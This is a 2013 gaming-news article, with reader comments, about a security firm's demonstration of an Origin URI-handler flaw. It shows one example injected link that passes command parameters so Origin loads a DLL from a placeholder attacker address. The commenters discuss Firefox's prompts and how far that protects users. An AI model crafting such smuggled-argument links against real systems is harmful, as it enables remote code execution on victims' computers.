Origin browser exploit demonstrated, possibility of malicious software execution

Ha ha ha I love these stupid images

By on March 19, 2013 at 1:30 pm

Origin users are being warned that an exploit exists which could allow programs to use Origin to execute malicious code on your computer. The exploit, which works in much the same manner as a similar one spotted in Steam in October, would allow a hacker to use a web browser to force-open Origin and make it run unwanted code.

The exploit would change the command from normal syntax, such as origin://LaunchGame/[GameID], to something closer to origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll.

Security firm ReVuln, who also discovered the Steam exploit, have released a paper on the hack, as well as a video demonstration.

EA have sent a comment to Ars Technica to say “Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure.”

Source: Ars Technica

Tags: ,
5 comments (Leave your own)

I wonder if its related to the Patching that origin just did now

 

Yeah I noticed a patch this morning too. Checked the changelog and nothing relating to this showed up in the latest release.

 

So… only thing I can see in Firefox under applications is ‘origin’ content type, which is already set to ‘always ask’. Pretty sure I’ve never touched the setting for it, so by default Firefox isn’t really vulnerable to this? Unless you click ‘yes’ to a completely uncalled for origin launch, of course.

edit – yeah, pasting any kind of origin:// command into the url bar results in a prompt… false alarm

 

ooshp,

Only if you use Firefox (maybe others) and only if you are one of the people that doesn’t click ‘Always do this’. You’d be surprised at the amount of people that click the ‘Always Open, don’t ask again’ buttons.

 

Is this new DLC from EA…..??? I luv EA

 
Leave a comment

You can use the following bbCode
[i], [b], [img], [quote], [url href="http://www.google.com/"]Google[/url]

Leave a Reply

PC Gaming Calendar 2014

Follow Games.on.net

YouTube

Steam Group

Upcoming Games

Community Soapbox

Recent Features
far_cry_4_2

Far Cry 4: Wielding the will to power

"A living being seeks above all else to discharge its strength. Life itself is will to power. Nothing else matters."

battlecry

Will Battlecry dethrone Dota or de-hat TF2? We play the game and speak to the team

In a world where gunpowder is banned, nations just stab each other instead to solve problems. We jump right in.

gta_5_ps4_xb1_1

Grand Theft Auto 5 comes alive on next-gen: We look at the PS4 re-release

With a completely overhauled engine and a new first-person mode, is GTA V's next-gen release worth your time?

amd_gear_winners

Gear up for Christmas with AMD: Winners announcement!

'Twas the month before Christmas, and all through the house...

dragon_age_inquisition_review_20

Inquisition is “a new foundation” for BioWare: We chat to Mike Laidlaw

Why can't you have an entire party of dogs? Why can't I turn into a swarm of bees? We ask these important questions and more.

Streaming Radio
Radio Streams are restricted to iiNet group customers.

GreenManGaming MREC

Facebook Like Box